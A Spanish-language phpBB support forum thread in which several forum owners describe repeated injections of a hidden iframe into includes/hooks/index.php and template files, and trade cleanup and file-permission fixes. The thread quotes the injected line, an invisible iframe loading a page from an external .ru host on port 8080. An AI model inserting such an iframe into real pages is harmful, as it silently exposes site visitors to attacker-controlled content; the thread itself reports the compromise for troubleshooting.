phpBB España Oficial

Hola, bueno el problema es que ultimamente me esta pasando cada vez mas seguido que entro a mi foro y aparece un codigo en la parte superior, a mi parecer creo que es que me lo hackearon y como ya me ha pasado muchas veces me gustaria saber si hay alguna forma de evitar que siga pasando.

El codigo que me sale es el siguiente:

[phpBB Debug] PHP Notice: in file /includes/session.php on line 1006: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 1006: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 1006: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3861: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3863: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3864: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3865: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)

Probe cambiar la contresaña por una mas segura y actualizar la version de php, pero siga pasando, espero que puedan ayudarme.

Gracias

***************************************************************************************************************************************************

Datos de soporte
Versión phpBB: phpBB3 (3.0.5)
MODs Instalados: phpBB SEO
Plantilla(s) usada(s): subsilver
Servidor: dattatec (plataforma, linux)
Actualización desde otra versión: si de 3.0.3
Conversión desde otro sistema de foros: no

url: http://www.foro-rock.com.ar

Quizas funcione bien cuando entren, porque lo arreglo restaurando la copia de seguridad pero muchas veces vuelve a pasar.

Estuve viendo y me encontre con que el error se debe a que insertan un codigo de este tipo al final de un pagina:

<iframe src="http://xj4.ru:8080/index.php" width=142 height=103 style="visibility: hidden"></iframe>

La pregunta entonces es si hay alguna manera de evitar que inserten este tipo de codigos.

Gracias

siempre que te pasa te devuelve el mismo error?

Casi siempre es el mismo, me dice que el error esta en algunos de estos archivos:
includes/functions.php
includes/session.php
includes/hooks/index.php

El codigo me lo habian insertado en includes/hooks/index.php

la único forma de evitar que te inserten código malicioso es tener el foro en un servidor seguro y actualizar el foro a la última versión. Quizá el problema sea el servidor... no sé

Amigos me pasa exactamente lo mismo, el mismo error, el mismo tipo de código malicioso, ahora la cosa es que yo considero que mi hosting es bastante seguro, y me he comunicado con ellos y sólo me han dicho que actualice el foro, lo que hice pero el error continua... es el problema. Justo yo también estoy en Argentina.
que cosa rara....





URL: http://www.choppersclub.com.ar/foro
Versión phpBB: phpBB3 (3.0.5)
MODs Instalados: ninguno
Plantilla(s) usada(s): twilightBB Style by Daniel St. Jules of Gamexe.net
Servidor: servidor pago, awardspace
Actualización desde otra versión: 3.0.1 a 3.0.5
Conversión desde otro sistema de foros: no

usad un editor de texto plano que permita guardar con codificación UTF-8 sin BOM, como el notepad++, y abrid esos archivos que den problemas, y buscad el código malicioso y eliminadlo.

HuanManwe escribió:usad un editor de texto plano que permita guardar con codificación UTF-8 sin BOM, como el notepad++, y abrid esos archivos que den problemas, y buscad el código malicioso y eliminadlo.

Hola !!! te comento que yo hago eso a diario 3 y 4 veces... elimino el código constantemente y soluciono el problema y luego 8 horas o menos después vuelve a aparecer, haciendo publicidad a otra página .ru y esas cosas...

Uno de los chicos del foro me dio una idea, que tal vez pueda ayudar, poner el archivo como de solo lectura, creo que puede funcionar, si soluciono el problema les aviso de seguro.... un abrazote...

Elena

Acá traigo novedades... amigos nada, protegí el archivo con el Dreamweaver CS3 y lo convertí a sólo lectura, con todo esto lo coloque al hosting, y 4 horas después exactamente, regreso otra vez el código malicioso...

Por cuadragésima vez en el día, edite el archivo, borre el código malicioso y todo volvió a la normalidad.

No puedo creer que no pueda haber alguna solución definitiva a ésto. No puedo pasar el día borrando el código malicioso...

Bueno amigos, sigo en la búsqueda de la solución y esperando que algo mas se me ocurra...
Un fuerte abrazo
Elena

yo creo que es problema de seguridad del servidor, y no del phpBB3. De todos modos poco importa si lo pones como solo lectura en tu PC, porque lo importante es qué permisos tenga en el servidor, y ahí debe tener los adecuados para que el foro funcione.

HuanManwe escribió:yo creo que es problema de seguridad del servidor, y no del phpBB3. De todos modos poco importa si lo pones como solo lectura en tu PC, porque lo importante es qué permisos tenga en el servidor, y ahí debe tener los adecuados para que el foro funcione.

Pensé lo mismo, y ayer hice modificaciones de seguridad desde el hosting sobre el archivo, pero se ve que no fue suficiente, de 755 lo coloque en 644 pero igual siguió apareciendo el código malicioso. Como el hosting me permite este tipo de opciones y me dice que para mejor efecto y mejores opciones puede modificar los permisos mas satisfactoriamente a través de FTP client que tenga, pues así lo hice, con la opción de permisos del CS3, y bueno lo deje en 400 (solo lectura por el propietario)... Vamos a ver que pasa ahora, si sigo teniendo problemas...

Lo bueno es que el foro funciona perfectamente con esta modificación de permiso sobre ese archivo, así que esperemos a ver que pasa...
Como siempre los mantengo informados sobre lo que suceda...
Abrazos y mas abrazos
Elena

¿Y que pasa si dejas lo que te añaden al código html como si fuera un comentario? Antes del iframe y después Si el ataque es automático tal vez se conformen en comprobar que el código está, no si carga en la página y esto debería evitar que cargue el iframe. También es posible que estén continuamente cada cierto tiempo cambiando el archivo y esto no funcione.

dragoner escribió:¿Y que pasa si dejas lo que te añaden al código html como si fuera un comentario? Antes del iframe

Código: Seleccionar todo

<!--

y después

Código: Seleccionar todo

-->

Si el ataque es automático tal vez se conformen en comprobar que el código está, no si carga en la página y esto debería evitar que cargue el iframe. También es posible que estén continuamente cada cierto tiempo cambiando el archivo y esto no funcione.

Sabes que es también una buena opción, no había pensado en ella...
Les comento como viene la cosa, y les digo lo que he hecho en estas últimas hora con el problema...

Hurgando toda la noche archivo por archivo, encontré que también el código se instala en el archivo /style/(todos los estilos)/template/index_body.html. Como siempre, una por una, borre de cada archivo de cada estilo que tengo instalado el código malicioso, modifique los permisos del archivo, coloque que solo el propietario puede leerlos, elimine para todos las opciones de escritura y demás. Gracias a eso evite que se copiara el código nuevamente. Note ésto, porque fui atacada nuevamente y estos archivos no fueron modificados.

El archivo definitivamente vulnerable el es includes/hooks/index.php. Este por más modificaciones de permisos que he realizado es modificado. Ahora intente modificar los permisos no solo del archivo index.php, si no de toda la carpeta. Por si acaso, como otra medida preventiva, modifique en nombre de la carpeta; y como este archivo es llamado por common.php, fui allí y modifique la ruta para que tenga acceso. Pensando en que lo que sea que ataca, pueda leer la ruta del archivo common.php y dañar nuevamente todo, modifique los permisos a ver si esto ayuda.

Bueno amigos, sigo en la espera a ver que pasa.... si con todo esto vuelvo a ser atacada, aplicaré tu idea dragoner...
Un fuerte abrazo a todos

Elena